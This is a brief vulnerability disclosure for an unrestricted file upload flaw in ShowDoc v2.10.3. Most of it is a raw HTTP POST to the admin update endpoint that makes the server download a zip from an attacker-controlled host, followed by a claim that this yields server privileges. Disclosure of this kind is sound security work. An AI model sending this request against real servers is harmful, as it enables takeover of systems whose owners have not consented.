There is a Unrestricted Upload of File vulnerability in AdminUpdateController.class.php
in ShowDoc v2.10.3
POST /showdoc-2.10.3/server/index.php?s=/api/adminUpdate/download HTTP/1.1
Host: 10.211.55.5
Content-Length: 66
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://10.211.55.5
Referer: http://10.211.55.5/showdoc-2.10.3/web/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=47uvgq7efm1ethua6a8podcse6; think_language=zh-CN; cookie_token=09d404934af99f9a7cafad11e061df0c23fc785a28781b655a152a7b1eb43000
Connection: origin
new_version=666&file_url=http://192.168.1.7:88/showdoc-666.zip
After the attacker login to the admin panel, the vulnerability can be used to obtain server privileges.